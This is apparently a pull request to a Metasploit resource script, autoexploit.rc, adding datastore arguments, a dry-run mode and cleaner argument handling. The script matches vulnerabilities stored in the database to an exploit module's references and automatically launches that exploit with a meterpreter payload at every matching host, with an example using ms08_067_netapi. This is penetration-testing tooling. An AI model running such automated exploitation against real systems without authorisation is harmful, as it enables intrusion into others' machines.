### PR TITLE
Allow datastore options plus other things

### DIFF
--- a/scripts/resource/autoexploit.rc
+++ b/scripts/resource/autoexploit.rc
@@ -20,11 +20,11 @@ def help_me
 
 	Arguments:
 		rc_path      - Full path to the RC script
-		db_user      - Username for MSF database (datastore: 'DB_USER')
-		db_pass      - Password for MSF database (datastore: 'DB_PASS')
-		db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
-		module_path  - Path to the exploit (datastore: 'MODULE')
-		dry          - Optiona. Dry-run mode [yes/no]
+		db_user      - Username for MSF database       (datastore: 'DB_USER')
+		db_pass      - Password for MSF database       (datastore: 'DB_PASS')
+		db_worksapce - Workspace for the database      (datastore: 'DB_WORKSPACE')
+		module_path  - Path to the exploit             (datastore: 'MODULE')
+		dry          - Optional. Dry-run mode [yes/no] (datastore: 'DRY')
 
 	Example:
 		msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi

--- a/scripts/resource/autoexploit.rc
+++ b/scripts/resource/autoexploit.rc
@@ -1,4 +1,3 @@
-# easy-autoexploiter.rc
 # Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
 
 
@@ -48,7 +47,7 @@ end
 
 
 #
-# See if there is any unmatched refs
+# See if there is a match for the exploit
 #
 def ref_has_match(vuln_refs, exp_refs)
 	# exp_refs is an array of URLs
@@ -107,7 +106,6 @@ end
 # Connect to the database
 #
 def init_db(username, password, workspace)
-	# Check params
 	if username.empty? or password.empty?
 		raise ArgumentError, "You must have a credential to connect to your database"
 	end
@@ -179,6 +177,9 @@ def is_db_connected?
 end
 
 
+#
+# Initialize our arguments
+#
 def init_args
 	args = {}
 	if ARGV.join('') =~ /^help$/i
@@ -199,6 +200,12 @@ def init_args
 end
 
 
+#
+# Code below serves as our "main" code.
+# We chose not to wrap it around in a run() function, because if
+# we do, any "return" will exit msfconsole, and we don't actually want that
+# to happen.
+#
 begin
 	args = init_args
 	if args[:help]

--- a/scripts/resource/autoexploit.rc
+++ b/scripts/resource/autoexploit.rc
@@ -16,14 +16,18 @@ def help_me
 		default to a suitable meterpreter.
 
 	Usage:
-		./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path]
+		./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [dry]
 
 	Arguments:
 		rc_path      - Full path to the RC script
-		db_user      - Username for MSF database
-		db_pass      - Password for MSF database
-		db_worksapce - Workspace for the database
-		module_path  - Path to the exploit (ie: windows/smb/ms08_067_netapi)
+		db_user      - Username for MSF database (datastore: 'DB_USER')
+		db_pass      - Password for MSF database (datastore: 'DB_PASS')
+		db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
+		module_path  - Path to the exploit (datastore: 'MODULE')
+		dry          - Optiona. Dry-run mode [yes/no]
+
+	Example:
+		msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
 
 	Authors:
 		m-1-k-3 <m1k3[at]s3cur1ty.de>
@@ -105,7 +109,7 @@ end
 def init_db(username, password, workspace)
 	# Check params
 	if username.empty? or password.empty?
-		raise RuntimeError, "You must have a credential to connect to your database"
+		raise ArgumentError, "You must have a credential to connect to your database"
 	end
 
 	print_status("Connecting to database: #{workspace}")
@@ -118,11 +122,7 @@ end
 #
 def auto_exploit(module_path)
 	exploit = load_exploit(module_path)
-
-	if exploit.nil?
-		# Force msfconsole to abort, because we failed to initialize the rc script properly
-		raise RuntimeError, "Exploit not found: #{module_path}"
-	end
+	raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
 
 	exploit_refs = exploit.references
 
@@ -137,7 +137,7 @@ def auto_exploit(module_path)
 
 	framework.db.workspace.vulns.each do |vuln|
 		next if not ref_has_match(vuln.refs, exploit_refs)
-		print_status("Using #{exploit.shortname} against host #{vuln.host.address.to_s}")
+		print_good("Using #{exploit.shortname} against host #{vuln.host.address.to_s}")
 		run_single("use #{exploit.fullname}")
 		run_single("set RHOST #{vuln.host.address.to_s}")
 		run_single("set payload #{get_payload}")
@@ -149,40 +149,82 @@ def auto_exploit(module_path)
 end
 
 
-# Print help upon request
-if ARGV.join('') =~ /^help$/i
-	help_me
-	run_single('exit')
-	return
+#
+# Find all mathing references
+#
+def dry_run(module_path)
+	exploit = load_exploit(module_path)
+	raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
+
+	exploit_refs = exploit.references
+
+	framework.db.workspace.vulns.each do |vuln|
+		next if not ref_has_match(vuln.refs, exploit_refs)
+		addr = vuln.host.address.to_s
+		print_good("#{addr} seems vulnerable to #{exploit.shortname}")
+	end
 end
 
-#[db_user] [db_pass] [db_workspace] [module_path]
-u = ARGV.shift || 'postgres'  #default username in msf manual
-p = ARGV.shift || ''
-w = ARGV.shift || 'msf'       #default workspace in msf manual
-m = ARGV.shift || ''
 
-# Initilize the database
+#
+# See if we're already connected
+#
+def is_db_connected?
+	begin
+		framework.db.hosts
+		return true
+	rescue ::ActiveRecord::ConnectionNotEstablished
+		return false
+	end
+end
+
+
+def init_args
+	args = {}
+	if ARGV.join('') =~ /^help$/i
+		args[:help] = true
+		return args
+	end
+
+	datastore           = framework.datastore
+	args[:db_user]      = ARGV.shift || datastore['DB_USER'] || ''
+	args[:db_pass]      = ARGV.shift || datastore['DB_PASS'] || ''
+	args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
+	args[:module]       = ARGV.shift || datastore['MODULE'] || ''
+	args[:dry]          = (ARGV.shift || datastore['DRY']) =~ /^yes$/i ? true : false
+
+	raise ArgumentError, "Missing a module path" if args[:module].empty?
+
+	return args
+end
+
+
 begin
-	init_db(u, p, w)
+	args = init_args
+	if args[:help]
+		help_me
+		return
+	else
+		if not is_db_connected?
+			init_db(args[:db_user], args[:db_pass], args[:db_workspace])
+		end
+	end
+
+	if args[:dry]
+		dry_run(args[:module])
+	else
+		auto_exploit(args[:module])
+	end
+
+rescue ArgumentError => e
+	print_error("Invalid argument: #{e.message}")
+	return
+
 rescue RuntimeError => e
 	print_error(e.message)
-	run_single('exit')
 	return
+
 rescue ::Exception => e
 	raise e
-end
-
-# Run auto exploit
-begin
-	if framework.datastore['MODULE'].nil?
-		auto_exploit(m)
-	else
-		auto_exploit(framework.datastore['MODULE'])
-	end
-rescue RuntimeError => e
-	print_error(e.message)
-	run_single('exit')
-	return
 end
 </ruby>


### PR DESCRIPTION
Here's a list of things that have changed:
- Allow datastore options as argumnets.
- Allow "dry-run" mode
- Cleaner way to initialize arguments

This is based on pull request #577
